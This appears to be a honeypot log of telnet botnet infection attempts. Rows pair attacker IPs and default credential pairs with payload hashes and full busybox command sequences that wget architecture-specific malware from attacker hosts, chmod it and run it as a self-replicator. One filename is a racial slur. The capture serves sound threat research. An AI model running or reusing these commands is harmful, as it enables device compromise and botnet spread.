| IP address |
User name |
Password |
SHA256 of the payload file |
 45.95.168.231
| support | 123456 | 65051be3207f8dfed3fc32b90b75ce6bd1097c5f3b4f8595bb5e59a5a5b2c6fd |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .sssnnnooorrrttt amk
/bin/busybox cp /bin/busybox .sssnnnooorrrttt; >.sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox METH
/bin/busybox wget; /bin/busybox tftp; /bin/busybox METH
/bin/busybox wget http://45.95.168.231:80/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.m68k -O - > .sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
./.sssnnnooorrrttt selfrep.m68k; /bin/busybox DRUGS
/bin/busybox rm -rf amk; >.sssnnnooorrrttt; /bin/busybox METH |
45.95.168.228 | root | hunt5759 | 87756df2a82a3da84e0138da9c2684751ca3bcec53c5e7f556aecd44bcff364b |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .sssnnnooorrrttt amk
/bin/busybox cp /bin/busybox .sssnnnooorrrttt; >.sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox METH
/bin/busybox wget; /bin/busybox tftp; /bin/busybox METH
/bin/busybox wget http://45.95.168.228:80/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.sh4 -O - > .sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
./.sssnnnooorrrttt selfrep.sh4; /bin/busybox DRUGS
/bin/busybox rm -rf amk; >.sssnnnooorrrttt; /bin/busybox METH |
45.95.168.105 | admin | 1234 | 7a6218efb640ee72ad944a338385259324303925a38f62b0ebd759581c44cbb8 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://45.95.168.105:80/bins/ppc -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
 155.138.160.87
| root | hunt5759 | 00fc86f4279542bfb3df4f88a40d2946e492a3a12e81732e67a8407c66235590 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://155.138.160.87:80/bins/sora.m68k -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.m68k; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
45.95.168.105 | telnet | telnet | 3f869eb28a173b4672facd60db96e8d575f1e631eb851433695d05a012d87af9 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Iwsrfg Cewsrghs
/bin/busybox cp /bin/busybox Iwsrfg; >Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AA
/bin/busybox wget http://45.95.168.105:80/bins/x86 -O - > Iwsrfg; /bin/busybox chmod 777 Iwsrfg; /bin/busybox AA
./Iwsrfg loader.wget; /bin/busybox SYLVEONA
/bin/busybox rm -rf Cewsrghs; >Iwsrfg; /bin/busybox AA |
45.95.168.228 | root | 1234qwer | d5853c995b25fc9db90556c83bd541e5967519a6501365ae515d1569eaa2e78b |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .sssnnnooorrrttt amk
/bin/busybox cp /bin/busybox .sssnnnooorrrttt; >.sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox METH
/bin/busybox wget; /bin/busybox tftp; /bin/busybox METH
/bin/busybox wget http://45.95.168.228:80/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.spc -O - > .sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
./.sssnnnooorrrttt selfrep.spc; /bin/busybox DRUGS
/bin/busybox rm -rf amk; >.sssnnnooorrrttt; /bin/busybox METH |
45.95.168.231 | 2323 | | df0ff160f9394546dfab3e55a4eea5b6b0fe8103d869113a62403b1b108811e9 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .sssnnnooorrrttt amk
/bin/busybox cp /bin/busybox .sssnnnooorrrttt; >.sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox METH
/bin/busybox wget; /bin/busybox tftp; /bin/busybox METH
/bin/busybox wget http://45.95.168.231:80/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.spc -O - > .sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
./.sssnnnooorrrttt selfrep.spc; /bin/busybox DRUGS
/bin/busybox rm -rf amk; >.sssnnnooorrrttt; /bin/busybox METH |
45.95.168.228 | mg3500 | merlin | 8cb81add4e1c7cdab80de10f279f0490133f07aeda7e9c43543ba836856a7524 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .sssnnnooorrrttt amk
/bin/busybox cp /bin/busybox .sssnnnooorrrttt; >.sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox METH
/bin/busybox wget; /bin/busybox tftp; /bin/busybox METH
/bin/busybox wget http://45.95.168.228:80/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.mips -O - > .sssnnnooorrrttt; /bin/busybox chmod 777 .sssnnnooorrrttt; /bin/busybox METH
./.sssnnnooorrrttt selfrep.mips; /bin/busybox DRUGS
/bin/busybox rm -rf amk; >.sssnnnooorrrttt; /bin/busybox METH |